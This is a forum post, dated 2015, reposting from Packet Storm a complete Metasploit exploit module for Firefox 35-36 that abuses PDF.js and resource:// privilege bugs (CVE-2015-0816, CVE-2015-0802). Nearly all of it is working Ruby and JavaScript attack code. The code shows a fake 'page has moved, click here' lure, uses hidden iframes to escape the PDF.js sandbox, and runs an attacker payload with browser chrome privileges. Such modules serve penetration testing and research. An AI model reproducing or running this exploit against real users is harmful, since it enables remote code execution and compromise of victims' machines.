Nytro Posted August 23, 2015 Report Posted August 23, 2015 Firefox PDF.js Privileged Javascript Injection Authored by temp66, joev, Marius Mlynski | Site metasploit.com This Metasploit module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, 'Name' => 'Firefox PDF.js Privileged Javascript Injection', 'Description' => %q{ This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability. }, 'Author' => [ 'Unknown', # PDF.js injection code was taken from a 0day 'Marius Mlynski', # discovery and pwn2own exploit 'joev' # copypasta monkey, CVE-2015-0802 ], 'DisclosureDate' => "Mar 31 2015", 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0816'], # pdf.js can load chrome:// ['CVE', '2015-0802'] # can access messageManager property in chrome window ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(35, 36) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>." ]) ], self.class) end def on_request_exploit(cli, request, target_info) print_status('Sending exploit...') send_response_html(cli, html) end def html "<!doctype html><html><body>#{datastore['CONTENT'] || default_html}"+ "<script>#{js}</script></body></html>" end def default_html "The page has moved. <span style='text-decoration:underline;'>Click here</span> to be redirected." end def js key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin <<-EOJSfunction xml2string(obj) { return new XMLSerializer().serializeToString(obj);}function __proto(obj) { return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;}function get(path, callback, timeout, template, value) { callback = _(callback); if (template && value) { callback = callback.replace(template, value); } js_call1 = 'javascript:' + _(function() { try { done = false; window.onclick = function() { if (done) { return; } done = true; q = open("%url%", "q", "chrome,,top=-9999px,left=-9999px,height=1px,width=1px"); setTimeout(function(){ q.location='data:text/html,<iframe mozbrowser src="about:blank"></iframe>'; setTimeout(function(){ var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; q.messageManager.loadFrameScript('data:,'+key, false); setTimeout(function(){ q.close(); }, 100) }, 100) }, 100); } } catch (e) { history.back(); } undefined; }, "%url%", path); js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined'; sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call1); })); setTimeout((function() { sandboxContext(_(function() { p = __proto(i.contentDocument.styleSheets[0].ownerNode); l = p.__lookupSetter__.call(i2.contentWindow, 'location'); l.call(i2.contentWindow, window.wrappedJSObject.js_call2); })); }), timeout);}function get_data(obj) { data = null; try { data = obj.document.documentElement.innerHTML; if (data.indexOf('dirListing') < 0) { throw new Error(); } } catch (e) { if (this.document instanceof XMLDocument) { data = xml2string(this.document); } else { try { if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') { data = this.document.body.firstChild.textContent; } else { throw new Error(); } } catch (e) { try { if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {; return null; } else { throw new Error(); } } catch (e) { ;; } } } } return data;}function _(s, template, value) { s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1]; s = s.substring(0, s.length - 1); if (template && value) { s = s.replace(template, value); } s += __proto; s += xml2string; s += get_data; s = s.replace(/\\s\\/\\/.*\\n/g, ""); s = s + ";undefined"; return s;}function get_sandbox_context() { if (window.my_win_id == null) { for (var i = 0; i < 20; i++) { try { if (window[i].location.toString().indexOf("view-source:") != -1) { my_win_id = i; break; } } catch (e) {} } }; if (window.my_win_id == null) return; clearInterval(sandbox_context_i); object.data = 'view-source:' + blobURL; window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,'; object.data = 'data:text/html,<'+'html/>'; window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+ '"position:absolute; left:-9999px;" onload = "'+_(function(){ window.wrappedJSObject.sandboxContext=(function(cmd) { with(importFunction.constructor('return this')()) { return eval(cmd); } }); }) + '"/>');}var HIDDEN = 'position:absolute;left:-9999px;height:1px;width:1px;';var i = document.createElement("iframe");i.id = "i";i.style=HIDDEN;i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";document.documentElement.appendChild(i);i.onload = function() { if (this.contentDocument.styleSheets.length > 0) { var i2 = document.createElement("iframe"); i2.id = "i2"; i2.style='opacity: 0;position:absolute;top:0;left:0;right:0;bottom:0;'; i2.height = window.innerHeight+'px'; i2.width = window.innerWidth+'px'; i2.src = "data:application/pdf,"; document.documentElement.appendChild(i2); pdfBlob = new Blob([''], { type: 'application/pdf' }); blobURL = URL.createObjectURL(pdfBlob); object = document.createElement('object'); object.style=HIDDEN; object.data = 'data:application/pdf,'; object.onload = (function() { sandbox_context_i = setInterval(get_sandbox_context, 200); object.onload = null; object.data = 'view-source:' + location.href; return; }); document.documentElement.appendChild(object); } else { this.contentWindow.location.reload(); }}document.body.style.height = window.innerHeight+'px';var kill = setInterval(function() { if (window.sandboxContext) { var f = "chrome://browser/content/browser.xul"; get(f, function() {}, 0, "%URL%", f); clearInterval(kill); } else { return; }},20);EOJS endendSursa: https://packetstormsecurity.com/files/133271 Quote